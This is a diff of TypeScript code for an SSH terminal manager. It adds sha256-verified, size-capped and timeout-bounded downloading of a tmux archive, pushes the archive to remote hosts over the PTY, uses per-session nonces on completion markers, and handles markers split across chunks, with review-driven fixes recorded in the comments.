+      try {
+        // #242 finding F1: the redirect hop needs the SAME timeout handling
+        // as the initial request below -- httpsDownload's shape
+        // (github-update.ts:640) covers both hops, not just the first.
+        const redirectReq = https.get(nextUrl, { timeout: TMUX_DOWNLOAD_REQUEST_TIMEOUT_MS }, (res2) => collect(res2, resolve, redirectsLeft - 1, nextUrl.toString()))
+        redirectReq.on('error', () => resolve(null))
+        redirectReq.on('timeout', () => { try { redirectReq.destroy(new Error('tmux tier-4 download timeout')) } catch {} })
+      } catch {
+        resolve(null)
+      }
+      return
+    }
+    if (!res.statusCode || res.statusCode >= 400) {
+      res.resume()
+      resolve(null)
+      return
+    }
+    const chunks: Buffer[] = []
+    // #242 finding F5: track accumulated length on the wire and bail past
+    // TMUX_ARCHIVE_MAX_BYTES -- destroy(), not resume(), so the socket
+    // actually stops instead of draining an unbounded body to /dev/null.
+    let received = 0
+    let overLimit = false
+    res.on('data', (c: Buffer) => {
+      if (overLimit) return
+      received += c.length
+      if (received > TMUX_ARCHIVE_MAX_BYTES) {
+        overLimit = true
+        logError(`[ssh] tmux tier-4 download for arch=${arch} exceeded the ${TMUX_ARCHIVE_MAX_BYTES}-byte cap -- discarding`)
+        res.destroy()
+        resolve(null)
+        return
+      }
+      chunks.push(c)
+    })
+    res.on('end', () => {
+      if (overLimit) return
+
+      const buf = Buffer.concat(chunks)
+      if (sha256Hex(buf) !== TMUX_STAGE_SHA256[arch]) {
+        logError(`[ssh] tmux tier-4 download for arch=${arch} failed sha256 verification -- discarding`)
+        resolve(null)
+        return
+      }
+      try {
+        fs.mkdirSync(tmuxCacheDir(), { recursive: true })
+        fs.writeFileSync(tmuxCachePath(arch), buf)
+      } catch (err) {
+        // Cache write failing doesn't invalidate the verified bytes already
+        // in hand -- this session's push still proceeds, just re-downloads
+        // next time.
+        logError(`[ssh] tmux tier-4 cache write failed for arch=${arch}: ${(err as Error)?.message ?? err}`)
+      }
+      resolve(buf)
+    })
+    res.on('error', () => resolve(null))
+  }
+  return new Promise((resolve) => {
+    try {
+      // #242 finding F1: httpsDownload's shape (github-update.ts:515/:640) --
+      // the `timeout` option alone does not abort anything; only this
+      // `req.on('timeout')` handler, destroying the request, actually does.
+      const req = https.get(url, { timeout: TMUX_DOWNLOAD_REQUEST_TIMEOUT_MS }, (res) => collect(res, resolve, 2, url))
+      req.on('error', () => resolve(null))
+      req.on('timeout', () => { try { req.destroy(new Error('tmux tier-4 download timeout')) } catch {} })
+    } catch {
+      resolve(null)
+    }
+  })
+}
+
+/** Cache hit first; only reaches the network on a miss/failed verification. */
+async function getOrDownloadTmuxArchive(arch: TmuxStageTarget): Promise<Buffer | null> {
+  const cached = readCachedTmuxArchive(arch)
+  if (cached) return cached
+  return downloadAndCacheTmuxArchive(arch)
+}
+
+// #242 round-3 MAJOR fix (test coverage): attemptTmuxPush calls this
+// indirection rather than getOrDownloadTmuxArchive directly, so tests can
+// stub the tier-4 archive source (cache hit or fresh download) without
+// touching the real filesystem/network -- mirrors the `_set*ForTest` seam
+// pattern already used elsewhere in this codebase (see
+// claude-account-identity.ts's `_setRootsForTest`). Reassigned ONLY by
+// `_setTmuxArchiveResolverForTest`; every production code path always goes
+// through the real `getOrDownloadTmuxArchive`.
+let tmuxArchiveResolver: (arch: TmuxStageTarget) => Promise<Buffer | null> = getOrDownloadTmuxArchive
+
+/** Test-only: override (or, passing `null`, restore) the tier-4 archive
+ *  source `attemptTmuxPush` calls, so a test can drive a full push without
+ *  hitting disk or the network. */
+export function _setTmuxArchiveResolverForTest(fn: ((arch: TmuxStageTarget) => Promise<Buffer | null>) | null): void {
+  tmuxArchiveResolver = fn ?? getOrDownloadTmuxArchive
+}
+
+/**
+ * #242 finding F1 (b): per-session nonce, keyed by sessionId, set once at
+ * spawn time (see spawnPty's SSH branch) and read by both the setup/stage/
+ * push writers (to bake it into the scripts they build) and the onData
+ * parsers (to require it in the sentinels they accept). Cleared in
+ * cleanupSessionResources so a stale nonce can never leak into a future,
+ * unrelated spawn of the same sessionId.
+ */
+const sshNonceBySession = new Map<string, string>()
+
+/** Test-only: read the REAL per-session nonce spawnPty generated, so a test
+ *  can construct a genuinely nonce-carrying sentinel to drive the real flow
+ *  end to end, rather than guessing/hardcoding a value that would never
+ *  match production randomId() output. */
+export function _getSshNonceForTest(sessionId: string): string | undefined {
+  return sshNonceBySession.get(sessionId)
+}
+
+/**
+ * #242 finding I1: per-session buffer for the not-yet-terminated tail of
+ * the `setup ok` completion sentinel line, mirroring `sshOscBuffers`/
+ * `extractSshOscSentinels` above -- same per-session map shape, same
+ * accumulate-then-clear discipline, same size cap. A real SSH link
+ * routinely segments a single logical line across multiple PTY chunks
+ * (`setup ok <nonce> tmux=pa` | `th\r\n`); `parseTmuxSentinel`'s
+ * chunk-boundary discipline (require the captured token be immediately
+ * followed by a line terminator) correctly refuses to match a truncated
+ * read off the FIRST chunk alone, but nothing re-parsed the SECOND chunk
+ * once the (pre-fix) bare-substring completion latch had already fired off
+ * the first one -- the tmux probe was then lost silently for the rest of
+ * the session on every segmented line, which is exactly the shape a real
+ * SSH connection produces (live-test repro, #242 finding I1). Buffering the
+ * accumulated text (not just the latest chunk) and re-testing the SAME
+ * nonce-bearing regex against it on every chunk, until it actually
+ * resolves, closes that gap.
+ */
+const MAX_SETUP_LINE_BUFFER = 4096
+
+/**
+ * ROUND-3 CORRECTION. The first cut of this buffer covered only the two
+ * setup-ok latches, leaving the tier-3/4 stage sentinel and the tier-4 arch
+ * probe parsing the raw chunk -- so I1 stayed live on exactly the tiers a
+ * tmux-less remote depends on. Proven in review by driving the real flow: a
+ * stage `ok path=` split across two chunks never resolves, the flow stalls to
+ * the 20s STAGE_TIMEOUT and silently loses tmux; an arch probe split across
+ * two chunks leaves detectedArch null, so tier 4 is unreachable on any
+ * segmenting link.
+ *
+ * Each sentinel gets its OWN buffer rather than sharing one, because they can
+ * interleave: the arch probe and the stage result are emitted by the same
+ * remote fragment and may arrive in one chunk, in either order, or split.
+ * Sharing a buffer would let one sentinel's resolve-and-clear discard the
+ * other's partial line.
+ */
+type SshLineBufferKind = 'setup' | 'stage' | 'arch'
+const sshLineBuffers = new Map<string, string>()
+const sshLineBufferKey = (sessionId: string, kind: SshLineBufferKind): string => `${sessionId}:${kind}`
+
+/**
+ * Accumulate `chunk` onto session `sessionId`'s setup-line buffer and return
+ * the FULL combined text callers should parse against instead of `chunk`
+ * alone -- mirroring `extractSshOscSentinels` above, which parses the
+ * complete combined text first and caps only what it RETAINS for next time.
+ * ROUND-2 CORRECTION: an earlier version capped the RETURNED value at
+ * `MAX_SETUP_LINE_BUFFER` too, not just what got stored -- so a genuine,
+ * correctly-nonced sentinel followed by more than the cap's worth of trailing
+ * bytes in the SAME chunk was silently dropped from the text actually
+ * parsed, and the session never latched setupDone at all (regression proven
+ * in review). The sentinel is not guaranteed to be near the end of the
+ * combined text -- trailing output in the same chunk is exactly the failure
+ * mode this correction closes -- so only the STORED copy (what the next
+ * chunk will be appended to) is capped, keeping its tail. A remote that
+ * never emits the line's terminating `\r`/`\n` (hostile, or simply chatty
+ * pre-setup output) must not grow the stored buffer without bound for the
+ * rest of the session.
+ */
+function bufferSshLine(sessionId: string, kind: SshLineBufferKind, chunk: string): string {
+  const key = sshLineBufferKey(sessionId, kind)
+  const combined = (sshLineBuffers.get(key) ?? '') + chunk
+  sshLineBuffers.set(
+    key,
+    combined.length > MAX_SETUP_LINE_BUFFER ? combined.slice(combined.length - MAX_SETUP_LINE_BUFFER) : combined
+  )
+  return combined
+}
+
+/** Back-compat alias for the setup-ok latches, which read more clearly named. */
+function bufferSetupLine(sessionId: string, chunk: string): string {
+  return bufferSshLine(sessionId, 'setup', chunk)
+}
+
+/** Drop one of `sessionId`'s sentinel buffers once that sentinel has resolved --
+ *  nothing left to accumulate for it for the rest of the session. */
+function clearSshLineBuffer(sessionId: string, kind: SshLineBufferKind): void {
+  sshLineBuffers.delete(sshLineBufferKey(sessionId, kind))
+}
+
+function clearSetupLineBuffer(sessionId: string): void {
+  clearSshLineBuffer(sessionId, 'setup')
+}
+
+/** Teardown: drop EVERY sentinel buffer for the session. Called from
+ *  cleanupSessionResources -- a per-kind clear on resolve is not enough,
+ *  because a session can die with a sentinel still unresolved. */
+function clearAllSshLineBuffers(sessionId: string): void {
+  for (const kind of ['setup', 'stage', 'arch'] as const) clearSshLineBuffer(sessionId, kind)
+}
+
+/** Test-only: read the current length of `sessionId`'s setup-line buffer
+ *  (mirrors `_getSshNonceForTest`'s role) -- `undefined` once cleared/never
+ *  populated. Lets tests assert the buffer is actually bounded and actually
+ *  torn down, rather than just asserting on end-to-end launch behaviour that
+ *  a leak/unbounded-growth mutation would leave unchanged. */
+export function _getSetupLineBufferLenForTest(
+  sessionId: string,
+  kind: SshLineBufferKind = 'setup',
+): number | undefined {
+  return sshLineBuffers.get(sshLineBufferKey(sessionId, kind))?.length
+}
+
 interface PtySession {
   ptyProcess: pty.IPty
   sessionId: string
@@ -131,6 +633,18 @@ export interface SSHOptions {
   password?: string
   postCommand?: string
   sudoPassword?: string
+  /**
+   * #242 tier 5: true when this spawn respawns a session that had
+   * previously reached `claude-running` over THIS SSH config — set by the
+   * renderer session store (never persisted to disk; see Session.
+   * sshReachedClaudeRunning in sessionStore.ts) when it re-spawns, e.g. via
+   * the Restart control after a dropped connection. Consumed by
+   * writeClaudeCmd via buildSshClaudeFlags (ssh-tmux.ts) to decide whether
+   * the bare (non-tmux) launch should carry `--continue`. Undefined/false
+   * on a session's first-ever spawn, where there is no prior conversation
+   * to continue.
+   */
+  reconnect?: boolean
 }
 
 /**
@@ -458,6 +972,87 @@ export function spawnPty(
     let containerSetupShellReady = false
     let claudeSent = false
     let claudeRunning = false
+    // #242 finding F1 (b), BLOCKER (adversarial review round 5): per-session
+    // nonce, generated ONCE here via randomId() (src/shared/id.ts -- the
+    // repo's CSPRNG helper, NOT Math.random) and baked into every setup/
+    // stage/push script this flow writes. Every sentinel the parsers below
+    // accept must carry it -- SECOND layer only, defeated by an attacker who
+    // can also read the tty (and so can copy the nonce verbatim). #242
+    // round-3 correction (I3): what survives that stronger attacker is now
+    // the SAME for every tier -- ON_PATH_TMUX_BIN_EXPR (tier 1) and
+    // STAGED_TMUX_BIN_EXPR (tier 2/3/4), both fixed host-authored literals
+    // (ssh-tmux.ts) that never read a wire-reported path at all. A copied
+    // nonce buys the attacker nothing beyond forcing CCC to pick between
+    // those two fixed tokens -- there is no longer a wire-reported operand
+    // for tier 1/2 to substitute (see parseTmuxSentinel's own doc comment).
+    // Registered in sshNonceBySession so the (test-only) _getSshNonceForTest
+    // accessor and cleanupSessionResources' teardown can both reach it.
+    const sshNonce = randomId()
+    sshNonceBySession.set(sessionId, sshNonce)
+    // #242 round-3 correction (I3): which entry of buildTmuxLaunchCommand's
+    // fixed literal table to use, once a 'setup ok'/stage/push sentinel
+    // reports a usable tmux -- never a wire-reported path. `null` means "not
+    // found" or "not yet known" -- writeClaudeCmd treats both the same way,
+    // writing the bare claudeCmd. `'onpath'` (tier 1, parseTmuxSentinel's
+    // `path` class) selects `ON_PATH_TMUX_BIN_EXPR`; `'staged'` (tier 2's
+    // `home` class, OR tier 3/4's stage/push `ok`) selects
+    // `STAGED_TMUX_BIN_EXPR` -- both are the SAME fixed remote location, so
+    // tier 2 and tier 3/4 share one outcome here.
+    let detectedTmuxSource: 'onpath' | 'staged' | null = null
+    // #242 tier 3: staging flags. `stagingAttempted` gates a SINGLE staging
+    // attempt per session regardless of which setup path (host vs
+    // container) reaches it -- host and container setup never both run in
+    // the same session (see writeContainerSetupCmd/runPostCommand), so one
+    // flag is enough. `stagingSent`/`stagingDone` mirror the setupSent/
+    // setupDone idempotency shape used for the other writers.
+    let stagingAttempted = false
+    let stagingSent = false
+    let stagingDone = false
+    let stagingTimeoutHandle: ReturnType<typeof setTimeout> | null = null
+    // #242 tier 4: arch learned from the probe writeTmuxStageCmd fires
+    // alongside the tier-3 staging command (see buildArchProbeCommandBracketed)
+    // -- known well before a possible `fail=download` sentinel arrives, since
+    // `uname` resolves near-instantly while curl/wget's failure (no egress)
+    // typically takes longer. Stays null if the probe's reply never arrives
+    // (chunk loss, non-standard remote shell) or reports an arch tier 4
+    // doesn't recognise -- either way, attemptTmuxPush never runs and the
+    // flow degrades to exactly its pre-tier-4 behaviour (bare launch).
+    let detectedArch: TmuxStageTarget | null = null
+    // #242 round-3 MINOR fix: `detectedArch === null` cannot distinguish
+    // "not yet resolved" from "resolved to an unrecognised arch" -- both
+    // leave detectedArch null, so gating re-parses on THAT condition kept
+    // re-running the arch-probe regex against every later PTY chunk for the
+    // rest of the session, and unrelated later output shaped like the
+    // sentinel could set detectedArch long after the probe. This latch
+    // flips true the first time `parseArchProbeSentinel` returns anything
+    // other than `undefined` (a real match OR an unrecognised-combo `null`),
+    // so the onData gate below considers the probe resolved either way.
+    let archProbeResolved = false
+    // Tier 4 push flags, mirroring stagingSent/stagingDone's idempotency
+    // shape. Only ever set when detectedArch is known AND tier 3 reported
+    // fail=download specifically -- see the stage-sentinel handler below.
+    let pushSent = false
+    let pushDone = false
+    let pushTimeoutHandle: ReturnType<typeof setTimeout> | null = null
+    // #242 finding F1 (adversarial review round 4, BLOCKER): separate timer
+    // for the DOWNLOAD phase specifically -- armPushSentinelTimeout (below)
+    // is reached only from runChunkedWrite's onDone, i.e. only once every
+    // chunk has actually been WRITTEN. Between `pushSent = true` and the
+    // archive-resolver's promise settling (a network fetch that can stall
+    // indefinitely -- a dead/slow HTTPS response, a hung proxy) there was no
+    // timer of any kind: attemptTmuxPush's own doc comment promises tier 4
+    // is "never a NEW way for the flow to get stuck with claude never
+    // launched", and an unbounded download phase broke exactly that.
+    let downloadTimeoutHandle: ReturnType<typeof setTimeout> | null = null
+    // #242 finding F3 (adversarial review round 4, MAJOR): flips true at the
+    // TOP of flowController.destroy() so any write callback still reachable
+    // from a timer destroy() couldn't clear in time (an anonymous setTimeout
+    // with no stored handle, or one whose handle a future edit forgets to
+    // clear) bails instead of driving ptyProcess.write() into a PTY destroy()
+    // just tore down -- the exact invariant destroy() exists to enforce
+    // (mirrors setupTimeoutHandle/idleFallbackHandle already being cleared
+    // there).
+    let destroyed = false
     // Tracks whether we're now in the inner shell (after postCommand
     // completed — e.g. inside the docker container). Drives whether
     // launchClaude() runs the container-setup re-run path or the
@@ -467,6 +1062,29 @@ export function spawnPty(
     let currentFlowInfo: string | undefined = undefined
     const SETUP_TIMEOUT_MS = 10000
     let setupTimeoutHandle: ReturnType<typeof setTimeout> | null = null
+    // #242 tier 3: generous vs. SETUP_TIMEOUT_MS -- staging downloads a
+    // ~1MB archive over the SSH connection itself before it can even start
+    // verifying/installing, so a slow link needs materially more room than
+    // the node setup blob (which touches no network). On timeout we treat
+    // it exactly like an explicit fail=* sentinel: fall through to the bare
+    // launch rather than leaving the flow stuck with claude never written.
+    const STAGE_TIMEOUT_MS = 20000
+    // #242 tier 4: a full push is a ~1.27 MB base64 transfer driven through
+    // runChunkedWrite at WRITE_CHUNK_SIZE(256B)/WRITE_CHUNK_DELAY(12ms) --
+    // roughly a minute of byte-chunking ALONE, before accounting for the
+    // remote shell actually executing ~650+ individual `echo … >> file`
+    // lines (each a fork+exec) as they arrive. Generous on purpose; a
+    // push that's still genuinely in flight must never be mistaken for a
+    // hung one.
+    const PUSH_TIMEOUT_MS = 120000
+    // #242 finding F1 (adversarial review round 4, BLOCKER): the DOWNLOAD
+    // phase (host-side fetch/cache-lookup of the archive, BEFORE a single
+    // chunk is written) had no timeout of its own -- see
+    // downloadTimeoutHandle's doc comment above. Sized well under
+    // PUSH_TIMEOUT_MS: this only bounds a network fetch/disk read of a
+    // few-hundred-KB file (or a cache hit, which is synchronous), nowhere
+    // near the ~60s+ the chunked transfer itself is budgeted for.
+    const DOWNLOAD_TIMEOUT_MS = 45000
 
     const setFlowState = (s: SshFlowState, info?: string) => {
       currentFlowState = s
@@ -511,9 +1129,10 @@ export function spawnPty(
           setupShellReady = true
           logInfo(`[ssh] ${sessionId}: idle after host setup ok → writing claudeCmd`)
           // Host setup runs only because user clicked Launch Claude (on
-          // host). Write claudeCmd — don't chain to postCommand even if
-          // configured. shellOnly is ignored: the click is consent.
-          if (!claudeSent) writeClaudeCmd()
+          // host). Proceed to claude (via tier-3 staging first if tmux
+          // wasn't found) — don't chain to postCommand even if configured.
+          // shellOnly is ignored: the click is consent.
+          if (!claudeSent) proceedAfterSetup()
           return
         }
 
@@ -550,7 +1169,7 @@ export function spawnPty(
         ) {
           containerSetupShellReady = true
           logInfo(`[ssh] ${sessionId}: idle after container setup ok → writing claudeCmd`)
-          writeClaudeCmd()
+          proceedAfterSetup()
           return
         }
 
@@ -654,7 +1273,7 @@ export function spawnPty(
           const setupCmd = claudeProvider.configureRemoteSettings(sessionId, remotePath, hooksConfig, {
             includeStatusLine: s?.statusLineEnabled !== false,
             includeConductorMcp: s?.conductorToolsEnabled !== false,
-          })
+          }, sshNonce)
           ptyProcess.write(setupCmd + '\r')
         } catch (err) {
           logError(`[ssh] ${sessionId}: host setup failed: ${(err as Error)?.message ?? err}`)
@@ -691,7 +1310,7 @@ export function spawnPty(
           const setupCmd = claudeProvider.configureRemoteSettings(sessionId, remotePath, hooksConfig, {
             includeStatusLine: s?.statusLineEnabled !== false,
             includeConductorMcp: s?.conductorToolsEnabled !== false,
-          })
+          }, sshNonce)
           ptyProcess.write(setupCmd + '\r')
         } catch (err) {
           logError(`[ssh] ${sessionId}: container setup failed: ${(err as Error)?.message ?? err}`)
@@ -700,16 +1319,445 @@ export function spawnPty(
       }, 300)
     }
 
-    const writeClaudeCmd = () => {
+    // #242 round-2 MINOR fix: `runningClaudeInfo` lets a caller that just
+    // resolved a tier-3 staging failure (or timeout) carry that reason
+    // forward onto the 'running-claude' state this function emits, instead
+    // of it being silently overwritten. Before this fix, the staging
+    // sentinel handler called setFlowState('running-setup',
+    // `tmux-stage-fail:<reason>`) and then IMMEDIATELY called
+    // writeClaudeCmd(), whose own setFlowState('running-claude') fired in
+    // the same tick -- both IPC messages went out, but any renderer that
+    // paints only the CURRENT state (not a log of every emit) never showed
+    // the reason. Passing it through here means the state a listener
+    // actually observes carries the info.
+    const writeClaudeCmd = (runningClaudeInfo?: string) => {
       // Idempotent. shellOnly is intentionally NOT gated: this writer
       // only runs after the user clicked Launch Claude (or after a
       // user-consented chain reached this stage), so the click is
       // their explicit consent regardless of any saved shellOnly flag.
       if (claudeSent) return
       claudeSent = true
-      setFlowState('running-claude')
-      logInfo(`[ssh] ${sessionId}: writing claudeCmd`)
-      setTimeout(() => ptyProcess.write(claudeCmd + '\r'), 200)
+      // #242: wrap in `tmux new-session -A` when detection found a binary
+      // on the remote, so a dropped SSH connection survives -- reconnecting
+      // and running this exact flow again lands on the SAME command, and
+      // `-A` attaches to the still-running claude instead of launching a
+      // second one. No wrap when detection found nothing (host has no tmux
+      // and no staged fallback) -- the bare claudeCmd is unchanged from
+      // pre-#242 behaviour.
+      let cmdToWrite = claudeCmd
+      let tmuxWrapped = false
+      if (detectedTmuxSource) {
+        // #242 round-3 correction (I3): buildTmuxLaunchCommand no longer
+        // takes a tmuxBin at all -- it picks ON_PATH_TMUX_BIN_EXPR /
+        // STAGED_TMUX_BIN_EXPR from `staged` alone, so there is no
+        // wire-reported operand left for this sink to trust. The try/catch
+        // stays as defence-in-depth: writeClaudeCmd is reached from
+        // setTimeout callbacks (armIdleFallback, ~line 546/583) AND directly
+        // from the onData listener -- an uncaught throw from either is
+        // re-thrown by the global uncaughtException handler and crashes main
+        // (adversarial review, #188, same shape documented on
+        // assertNotOptionLike in ssh-args.ts).
+        try {
+          cmdToWrite = buildTmuxLaunchCommand({ sessionId, innerCmd: claudeCmd, staged: detectedTmuxSource === 'staged' })
+          tmuxWrapped = true
+        } catch (err) {
+          logError(`[ssh] ${sessionId}: tmux launch command build failed, writing bare claudeCmd instead: ${(err as Error)?.message ?? err}`)
+        }
+      }
+      // #242 tier 5: `--continue` on a reconnect, but ONLY for the bare
+      // (non-tmux-wrapped) launch -- see buildSshClaudeFlags's doc comment
+      // (ssh-tmux.ts) for why `tmuxWrapped` (the ACTUAL outcome of the wrap
+      // attempt above, not merely `detectedTmuxSource`) is the right gate: a
+      // build-error in the try/catch above also means no tmux is in play
+      // for this write, even though a binary WAS detected.
+      const continueFlag = buildSshClaudeFlags({ reconnect: !!ssh.reconnect, tmuxInPlay: tmuxWrapped })
+      if (continueFlag) cmdToWrite = `${cmdToWrite} ${continueFlag}`
+      // #242 tier 5: resolveRunningClaudeInfo defaults the reason to
+      // 'probe=none' when this call carries no explicit one AND the launch
+      // ended up unwrapped -- every live tier-3/4 failure path already
+      // passes its own reason (stage-fail/push-fail) straight into
+      // runningClaudeInfo, but a defence-in-depth default means ANY future
+      // call site that reaches here unwrapped with no reason still tells
+      // the renderer SOMETHING rather than emitting 'running-claude' with
+      // no info at all -- the "failing silently" gap this tier closes.
+      setFlowState('running-claude', resolveRunningClaudeInfo(runningClaudeInfo, tmuxWrapped))
+      logInfo(`[ssh] ${sessionId}: writing claudeCmd${tmuxWrapped ? ' (tmux-wrapped)' : ''}${continueFlag ? ' (+continue)' : ''}`)
+      setTimeout(() => {
+        // #242 finding F3 (adversarial review round 4, MAJOR): this write is
+        // reachable from a leaked timer (stagingTimeoutHandle/
+        // pushTimeoutHandle/downloadTimeoutHandle -- all now cleared in
+        // destroy(), but a future timer added to this ladder could just as
+        // easily forget to be) firing AFTER the session was torn down.
+        // `destroyed` bails before ever attempting the write; the try/catch
+        // is defence-in-depth against any OTHER reason ptyProcess.write()
+        // might throw post-teardown (killPty's own write wraps in the same
+        // /* best-effort */ shape for exactly this reason).
+        if (destroyed) return
+        try {
+          ptyProcess.write(cmdToWrite + '\r')
+        } catch (err) {
+          logError(`[ssh] ${sessionId}: writeClaudeCmd's write failed post-schedule: ${(err as Error)?.message ?? err}`)
+        }
+      }, 200)
+    }
+
+    /**
+     * #242 tier 3: write the curl/wget staging fragment. Reached only when
+     * tier 1/2 (PATH, ~/.claude/bin) both missed -- see proceedAfterSetup.
+     * Idempotent like the other writers; the timeout is the fallback path
+     * for a sentinel that never arrives (dead download, a `sh` that
+     * doesn't support a construct we assumed, etc.) -- either way we must
+     * still reach writeClaudeCmd so the session isn't left stuck forever.
+     */
+    const writeTmuxStageCmd = () => {
+      if (stagingSent) return
+      stagingSent = true
+      stagingAttempted = true
+      setFlowState('running-setup', 'tmux-stage')
+      logInfo(`[ssh] ${sessionId}: tmux not found on remote -- staging via curl/wget (#242 tier 3)`)
+      stagingTimeoutHandle = setTimeout(() => {
+        stagingTimeoutHandle = null
+        if (!stagingDone) {
+          stagingDone = true
+          logError(`[ssh] ${sessionId}: tmux stage sentinel not received within ${STAGE_TIMEOUT_MS}ms -- falling through to bare launch`)
+          writeClaudeCmd('tmux-stage-fail:timeout')
+        }
+      }, STAGE_TIMEOUT_MS)
+      setTimeout(() => {
+        // #242 finding F3 (adversarial review round 4, MAJOR): bail before
+        // ever touching ptyProcess if the session was torn down while this
+        // was scheduled -- same reasoning as writeClaudeCmd's write-callback
+        // above.
+        if (destroyed) return
+        // #242 M5 correction (adversarial review round 5): buildTmuxStageCommand
+        // is pure, but it is NOT argument-free and it CAN throw -- it takes
+        // `sshNonce` and calls assertSafeTmuxStageConstants (ssh-tmux-stage.ts),
+        // which validates the nonce's charset among other module constants.
+        // In production that nonce is always a valid randomId() (guaranteed
+        // by construction, so this throw is not expected to fire), but the
+        // guard against a future call site passing something else is exactly
+        // why the try/catch below exists -- same shape every other PTY writer
+        // in this function uses (adversarial review, #188 shape).
+        try {
+          // #242 tier 4: fire the arch probe ALONGSIDE staging, not only
+          // after a fail=download sentinel arrives. `uname` resolves near-
+          // instantly; curl/wget's failure on an egress-less host typically
+          // takes longer (DNS timeout, connect timeout) -- sending the probe
+          // now means detectedArch is very likely already known by the time
+          // (if ever) tier 3 reports fail=download, with zero added latency
+          // on the critical path (a separate write, not a blocking round
+          // trip). A probe write failing to build/send is swallowed exactly
+          // like a stage write failure would be -- it only ever degrades
+          // tier 4 to "arch unknown, don't attempt the push", never blocks
+          // tier 3 itself.
+          try {
+            // #242 round-3 MINOR fix: bracketed in stty -echo/stty echo, the
+            // same treatment buildTmuxStageCommand's payload gets, so the
+            // probe command and its plaintext reply are not the one thing on
+            // this ladder still visible in the user's pane. See
+            // buildArchProbeCommandBracketed's doc comment for why it's
+            // bracketed rather than base64-wrapped like the stage command.
+            ptyProcess.write(buildArchProbeCommandBracketed() + '\r')
+          } catch (err) {
+            logError(`[ssh] ${sessionId}: tmux arch probe failed to send (tier 4 disabled for this session): ${(err as Error)?.message ?? err}`)
+          }
+          ptyProcess.write(buildTmuxStageCommand(sshNonce) + '\r')
+        } catch (err) {
+          logError(`[ssh] ${sessionId}: tmux stage command build failed, falling through to bare launch: ${(err as Error)?.message ?? err}`)
+          stagingDone = true
+          if (stagingTimeoutHandle) {
+            clearTimeout(stagingTimeoutHandle)
+            stagingTimeoutHandle = null
+          }
+          writeClaudeCmd('tmux-stage-fail:build-error')
+        }
+      }, 200)
+    }
+
+    /**
+     * #242 tier 4: push a pre-downloaded/cached, sha256-verified tmux
+     * archive down the live PTY as base64, for a remote tier 3 could not
+     * reach because it has NO outbound egress at all. Reached ONLY from the
+     * tier-3 stage-sentinel handler below, and only when `arch` is known
+     * (see the arch probe fired alongside writeTmuxStageCmd above) -- never
+     * from a code path that could fire without it. Idempotent (`pushSent`)
+     * like every other writer in this flow.
+     *
+     * On ANY failure to obtain bytes (no cache, download failed, digest
+     * mismatch) or to build/drive the push command, falls through to
+     * writeClaudeCmd exactly like a tier-3 failure would -- tier 4 is a
+     * best-effort extra rung on the ladder, never a NEW way for the flow to
+     * get stuck with claude never launched.
+     */
+    const attemptTmuxPush = (arch: TmuxStageTarget) => {
+      if (pushSent) return
+      pushSent = true
+      // #242 finding F1 (adversarial review round 4, BLOCKER): arm the
+      // download-phase timeout IMMEDIATELY -- before the host-side resolver
+      // (cache lookup or network fetch) has even started -- so a resolver
+      // that never settles (a stalled HTTPS response) cannot leave this
+      // session wedged forever with claude never launched. Cleared in the
+      // resolver's `.then()`/`.catch()` below BEFORE the `pushDone` guard
+      // runs, so a buffer that arrives after the timeout already fired is
+      // still correctly discarded rather than acted on twice.
+      downloadTimeoutHandle = setTimeout(() => {
+        downloadTimeoutHandle = null
+        if (pushDone) return
+        pushDone = true
+        logError(`[ssh] ${sessionId}: tmux archive download/cache lookup did not settle within ${DOWNLOAD_TIMEOUT_MS}ms -- falling through to bare launch`)
+        writeClaudeCmd('tmux-push-fail:download-timeout')
+      }, DOWNLOAD_TIMEOUT_MS)
+      setFlowState('running-setup', 'tmux-push')
+      logInfo(`[ssh] ${sessionId}: tmux download failed on remote (no egress) -- pushing cached/downloaded archive down the PTY (#242 tier 4, arch=${arch})`)
+      // #242 round-2 MAJOR fix: PUSH_TIMEOUT_MS used to be armed HERE, before
+      // even the host-side download/cache lookup ran -- so a slow (first-run,
+      // possibly-proxied) download ate the SAME 120s budget as the ~60s+
+      // chunked transfer that follows it, and nothing stopped a still-running
+      // runChunkedWrite when the timer fired anyway: writeClaudeCmd wrote
+      // `claude ...\r` into the PTY while base64 chunk lines were still being
+      // written, interleaving the launch command into the middle of the
+      // payload. Fixed two ways, belt-and-braces:
+      //   1. The timer is armed ONLY once every chunk has actually been
+      //      written (see the `onDone` hook below) -- from then on the only
+      //      thing left to wait for is the remote decoding/verifying/
+      //      installing and echoing its sentinel, which is what
+      //      PUSH_TIMEOUT_MS is actually sized for.
+      //   2. `isAlive` folds in `!pushDone`, so ANY path that sets pushDone
+      //      (this timer, a download failure, a build error) makes the NEXT
+      //      liveness check inside runChunkedWrite bail before its next
+      //      write.
+      // #242 round-3 MAJOR fix: (2) above only ever protected THIS function's
+      // OWN write loop -- it said nothing about a Launch-Claude click landing
+      // on `proceedAfterSetup`/`flowController.launchClaude` from OUTSIDE
+      // this function while pushSent is true and pushDone is still false
+      // (the entire multi-second-to-multi-minute window this transfer is
+      // open). That path bypassed runChunkedWrite's isAlive check entirely --
+      // it called writeClaudeCmd() directly, mid-transfer. Both call sites
+      // now carry their own `if (pushSent && !pushDone) return` guard (same
+      // shape as their pre-existing stagingSent/stagingDone guard), which is
+      // what actually makes "there is no longer a window where writeClaudeCmd
+      // can fire while a chunk write is still in flight" true.
+      const armPushSentinelTimeout = () => {
+        if (pushDone) return
+        pushTimeoutHandle = setTimeout(() => {
+          pushTimeoutHandle = null
+          if (!pushDone) {
+            pushDone = true
+            logError(`[ssh] ${sessionId}: tmux push sentinel not received within ${PUSH_TIMEOUT_MS}ms -- falling through to bare launch`)
+            writeClaudeCmd('tmux-push-fail:timeout')
+          }
+        }, PUSH_TIMEOUT_MS)
+      }
+      // #242 round-3 MAJOR fix (test coverage): calls the injectable
+      // `tmuxArchiveResolver` seam rather than `getOrDownloadTmuxArchive`
+      // directly, so tests can drive a full push without touching disk or
+      // the network (see `_setTmuxArchiveResolverForTest`). Identical in
+      // production -- the seam defaults to the real function.
+      tmuxArchiveResolver(arch).then((buf) => {
+        // #242 finding F1: clear the download-phase timeout BEFORE the
+        // pushDone guard below runs -- a resolver that settles just as (or
+        // just after) the timeout fires must not leave a stray timer
+        // running; the guard immediately after still discards a buffer
+        // that arrives too late to matter.
+        if (downloadTimeoutHandle) {
+          clearTimeout(downloadTimeoutHandle)
+          downloadTimeoutHandle = null
+        }
+        // Timeout (or some other path) may have already resolved this
+        // attempt by the time the download/cache lookup settles -- never
+        // act twice.
+        if (pushDone) return
+        if (!buf) {
+          pushDone = true
